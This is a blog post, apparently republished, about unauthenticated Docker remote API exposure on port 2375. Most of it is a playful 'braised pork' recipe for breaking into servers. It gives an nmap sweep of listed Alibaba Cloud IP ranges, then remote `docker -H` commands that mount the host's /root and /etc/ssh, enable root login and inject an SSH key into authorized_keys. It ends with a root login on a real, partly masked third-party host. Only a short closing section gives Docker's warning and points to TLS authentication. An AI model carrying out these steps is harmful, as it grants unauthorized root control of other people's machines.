Docker exposes port 2375, causing server attacks and solutions

I believe that students who have learned about the docker remote API are familiar with port 2375. 2375 is the default port for docker remote control. Through this port, you can directly operate the remote docker daemon.

When the $HOST host starts the daemon in docker daemon -H=0.0.0.0:2375 mode, you can directly operate the docker daemon of $HOST on the external machine:

docker -H tcp://$HOST:2375 ps

Okay, let’s talk about how to “invade”. How to invade the host machine through this port?

This should start from a few points:
1. Docker does not isolate user namespace , that is, the root user inside the container is the root user of the host machine. Once the directory is mounted, the mounted file system can be modified at will inside the container as the root user of the host machine.

• The docker service has high execution rights (equivalent to root), and ordinary users in the docker user group can execute commands such as docker run without any other verification.
• If SSL verification is not enabled on the exposed docker remote API port, any machine that can connect to the docker host can freely operate the docker daemon of the docker host (commands such as docker run, docker ps, docker rm, etc. are no problem).

Combining the above three points, we basically have the conditions to invade the Docker host.

This may sound a bit far-fetched, so let's take a fresh example:

(Please allow me to go through the process with a dish I recently learned╮(￣▽￣)╭ )

Secret Braised Pork (Docker Version)

Materials: Whole blocks of "5-flower" IP segments, the fatter the better (the more newbie users the better)

Ingredients: nmap, docker

Step 1: Scan port 2375

How to scan? I chose nmap , a simple and easy-to-use hacker essential tool.

Where to sweep? The target I chose was the IP segment of aliyun, and Baidu found out:

42.96.128.0/17 Alibaba (Beijing) Technology Co., Ltd. China 
42.120.0.0/16 Aliyun Computing Co., LTD China 
42.121.0.0/16 Aliyun Computing Co., LTD China 
42.156.128.0/17 Aliyun Computing Co., LTD China 
110.75.0.0/16 Asia Pacific Network Information Centre China 
110.76.0.0/19 Ali Technology Co., Ltd China 
110.76.32.0/20 Aliyun Computing Co., LTD China 
110.173.192.0/20 HiChina Web Solutions (Beijing) Limited China 
110.173.208.0/20 HiChina Web Solutions (Beijing) Limited China 
112.124.0.0/16 Hangzhou Alibaba Advertising Co., Ltd. China 
112.127.0.0/16 Hangzhou Alibaba Advertising Co., Ltd. China 
114.215.0.0/16 Hangzhou Alibaba Advertising Co., Ltd. China 
115.28.0.0/16 HiChina Web Solutions (Beijing) Limited China 
115.29.0.0/16 HiChina Web Solutions (Beijing) Limited China 
115.124.16.0/22 ​​Hangzhou Alibaba Advertising Co., Ltd. China 
115.124.20.0/22 ​​Hangzhou Alibaba Advertising Co., Ltd. China 
115.124.24.0/21 Hangzhou Alibaba Advertising Co., Ltd. China 
119.38.208.0/21 Hangzhou Alibaba Advertising Co., Ltd. China 
119.38.216.0/21 Hangzhou Alibaba Advertising Co., Ltd. China 
119.42.224.0/20 Alibaba (China) Technology Co., Ltd. China 
119.42.242.0/23 Hangzhou Alibaba Advertising Co., Ltd. China 
119.42.244.0/22 ​​Hangzhou Alibaba Advertising Co., Ltd. China 
121.0.16.0/21 Hangzhou Alibaba Advertising Co., Ltd. China 
121.0.24.0/22 ​​Hangzhou Alibaba Advertising Co., Ltd. China 
121.0.28.0/22 ​​Hangzhou Alibaba Advertising Co., Ltd. China 
121.196.0.0/16 Hangzhou Alibaba Advertising Co., Ltd. China 
121.197.0.0/16 Hangzhou Alibaba Advertising Co., Ltd. China 
121.198.0.0/16 Hangzhou Alibaba Advertising Co., Ltd. China 
121.199.0.0/16 Hangzhou Alibaba Advertising Co., Ltd. China 
140.205.0.0/16 Aliyun Computing Co., LTD China 
203.209.250.0/23 Hangzhou Alibaba Advertising Co., Ltd. China 
218.244.128.0/19 Hangzhou Alibaba Advertising Co., Ltd. China 
223.4.0.0/16 Hangzhou Alibaba Advertising Co., Ltd. China 
223.5.0.0/16 Hangzhou Alibaba Advertising Co., Ltd. China 
223.5.5.0/24 Hangzhou Alibaba Advertising Co., Ltd. China 
223.6.0.0/16 Hangzhou Alibaba Advertising Co., Ltd. China 
223.6.6.0/24 Hangzhou Alibaba Advertising Co., Ltd. China 
223.7.0.0/16 Hangzhou Alibaba Advertising Co., Ltd.

I don't produce IPs, I'm just a porter for Baidu. Don't ask me where these IPs come from, I want to know too~ >.<

Save the above IP content in a file, such as aliyun.list

Start scanning:

cat aliyun.list| awk '{print $1}' | xargs -n 1 -I {} nmap -sT -p2375 {} --open 
# Briefly explain the command:
# awk filters out the first column of IP segments # xargs sends the filtered IPs to nmap one by one, -I {} means using {} to replace the transmitted parameters # ...
# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST
# Nmap scan report for 42.96.MOSAIC.MOSAIC
# Host is up (0.070s latency).
# PORT STATE SERVICE
# 2375/tcp open docker
# ...

In less than two minutes, the first piece 42.96.MOSAIC.MOSAIC (the pork belly has been censored) "Pork belly" has been selected, come on~

Step 2: Test 2375's direct control

docker -H tcp://42.96.MOSAIC.MOSAIC:2375 ps
 
# CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS  
# 73aa690e7c92 imdjh/owncloud-with-ocdownloader "/entrypoint.sh" 9 days ago Up 3 days 0.0.0.0:9009->80
# f57c56af0e29 rethinkdb:2.3.2 "rethinkdb --bind all" 9 days ago Up 3 days 8080/tcp, 28015/
# 37c1401db593 gaomd/ikev2-vpn-server:0.3.0 "/bin/sh -c /usr/bin/" 10 days ago Up 3 days 0.0.0.0:500->500
# af7338a5426d nginx:1.9-alpine "nginx -g 'daemon off" 3 weeks ago Up 3 days 443/tcp, 0.0.0.0
# ...

The owner of this server is really cooperative (⊙ο⊙). We can see the content directly through PS, which means that the 2375 of this host has no SSL verification, which basically meets the intrusion requirements.

Wash and cut the "five flowers" and prepare them for the pot~

Step 3: Remotely start your own container

What can you do after taking control of Docker? I got it and it was great~

# images Check out the existing local images# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 images
# ...
# swarm latest 47dc182ea74b 4 weeks ago 19.32 MB
# jwilder/nginx-proxy latest 203b20631e41 4 weeks ago 255.6 MB
# ubuntu latest c5f1cf30c96b 4 weeks ago 120.8 MB
# shipyard/shipyard latest ba426f0944bc 5 weeks ago 58.92 MB
# ...

Some output is omitted. There are quite a lot of images. Let's choose Ubuntu.

# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

Seeing this step, I believe that students who have some knowledge of ssh should understand

Step 4: ssh pub key injection

In the container that has just been started, first look at the PermitRootLogin field in /tmp/ssh_etc/sshd_config (that is, the host's /etc/ssh/sshd_config ). If it is no , change it to yes to allow root to log in via ssh

Then generate a new pair of pub keys on your machine (if you already have an ssh key, it is recommended to generate a new one, do not use the ssh pub key you use daily)

# Use ssh-keygen to generate ssh-keygen -t rsa -C "[email protected]"
# After executing the command, be careful to avoid overwriting your own ssh key by reading the prompt "Enter file in which to save the key". You can choose /tmp/id_rsa
# For other prompts, just enter

Continue, inject the ssh pub key, and return to the container just started to execute

cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA.... # Paste the /tmp/id_rsa.pub file you just generated on your machine here
>EOF
 
# If the /tmp/root/.ssh directory does not exist, create it directly

Add star anise, bay leaves, light soy sauce, dark soy sauce and vinegar, cook over medium heat, and prepare to serve.

Step 5: Login to the server

# ssh -i specify the key to log in ssh -i /tmp/id_rsa [email protected]
 
# Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)
#
# * Documentation: https://help.ubuntu.com/
#
# Welcome to aliyun Elastic Compute Service!
#
# Last login: Fri Jun 3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC
# manpath: can't set the locale; make sure $LC_* and $LANG are correct
# root@iZ28p9b7e***:~# 
# ...

Cook over high heat until the sauce thickens, then remove from heat!

Solemn Declaration

The above tutorial is for communication and learning purposes only. id_rsa.pub on the 42.96.MOSAIC.MOSAIC server has been actively cleared after this tutorial was completed, and a message was left on the service to inform you.

If you accidentally discover the available port 2375, I hope you can stop using it and not use it for other purposes , or find other intrusion vulnerabilities, so that you can communicate and learn with everyone.

Is 2375 a docker vulnerability?

No! Exposing 2375 directly to the public Internet is purely a matter of user habit or laziness . 2375 can be used for convenient testing in a relatively secure internal network and is not suitable for use in a production environment.

There is a sentence in the first document of Docker official website, Quick Start, which says:

Warning: Changing the default docker daemon binding to a TCP port or
Unix docker user group will increase your security risks by allowing
non-root users to gain root access on the host. Make sure you control
access to docker. If you are binding to a TCP port, anyone with
access to that port has full Docker access; so it is not advisable
on an open network.

Warning: If the daemon is directly exposed to a TCP port, it may be possible for a non-root user to obtain root privileges on the host machine. In fact, this is the reason why the server mentioned above was invaded.

How to prevent it

So, the question is, what should you do if you want to use Remote API but don’t want to be at risk of being hacked?

The official Docker documentation introduces a method of using the Remote API through CA authentication.

For details, please refer to: Protect the Docker daemon socket

(I will write another blog when I understand it, but I will just link it here OO)

The configuration process is relatively simple. Here is a picture showing the effect after configuring SSL:

This is the end of this article about the problem of Docker exposing port 2375 and causing server attacks and the solution. For more related content about Docker exposing port 2375, please search for previous articles on 123WORDPRESS.COM or continue to browse the following related articles. I hope everyone will support 123WORDPRESS.COM in the future!